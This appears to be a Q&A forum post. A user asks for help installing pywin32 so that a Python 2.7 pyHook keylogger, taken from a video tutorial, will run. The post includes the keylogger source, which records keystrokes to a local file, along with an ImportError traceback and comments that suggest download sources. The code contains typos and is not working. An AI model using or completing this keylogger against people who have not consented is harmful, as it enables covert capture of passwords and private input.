# Python Keylogger: ImportError: No module named pythoncom

Tags: python, module, importerror, pywin32, pyhook

I want to write a keylogger using this video:
https://www.youtube.com/watch?v=8BiOPBsXh0g

I've got PyHook but on PyWin32 I tried downloading it from the site given in the video. If anyone can send me a download link for it, I will be grateful and this would help me.

BTW I am using Python 2.7 because that is what PyHook is on, I wouldn't mind if you could send me both links for 3.6.3 either that would be good or guide me through it! :D

```
import pyHook, pythoncom, sys, logging

file_log - 'C:\\important\\log.txt'

def OnKeyboardEvent(event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
    chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True


hooks_manager = pyHook.HookManager()
hooks_manager.manger.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
```

Comment: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)] on win32
Type "copyright", "credits" or "license()" for more information.
>>> 
=============== RESTART: C:\Users\jacke\Desktop\Keylogger.pyw ===============

Traceback (most recent call last):
  File "C:\Users\jacke\Desktop\Keylogger.pyw", line 1, in <module>
    import pyHook, pythoncom, sys, logging
ImportError: No module named pythoncom
>>>

Comment: https://stackoverflow.com/questions/4145079/importerror-no-module-named-pythoncom

Comment: @oshaiken It says Python 2.7 cannot be found in registery!

Comment: https://www.activestate.com/activepython/downloads

Comment: @oshaiken No change has happened.